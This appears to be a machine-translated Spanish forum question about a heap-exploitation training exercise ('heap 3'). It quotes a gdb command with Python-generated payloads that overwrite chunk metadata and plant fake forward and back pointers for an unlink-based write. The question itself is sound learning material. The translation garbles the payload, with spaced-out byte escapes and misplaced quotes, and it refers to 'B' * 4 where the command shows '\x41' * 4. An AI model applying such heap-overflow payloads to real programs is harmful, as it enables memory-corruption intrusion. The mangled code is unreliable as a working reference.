Estoy practicando la habilidad de explotar mi montón con el siguiente sitio web.
enlace . Pero bajo el título del montón 3 hazaña, No entendí con lo que hace.
(gdb) r AAAA $ (python -c 'print "A" * 28 + "\ xfc \ xff \ xff \ xff" + "\ xfc \ xff \ xff \ xff" ') $ (python -c' print "\ x41" * 4 + "\ x1c \ xb1 \ x04 \ x08" + "\ x0c \ xc0 \ x04 \ x08" ') CCCC
Está explotando los metadatos del montón. Entiendo el primer argumento que se desborda Tamaño y tamaño anterior del fragmento B. Pero en el segundo argumento, ¿por qué comienza con 'B' * 4? ¿Por qué? Creo que debería seguir a fd y bk. Por favor, explícame. Gracias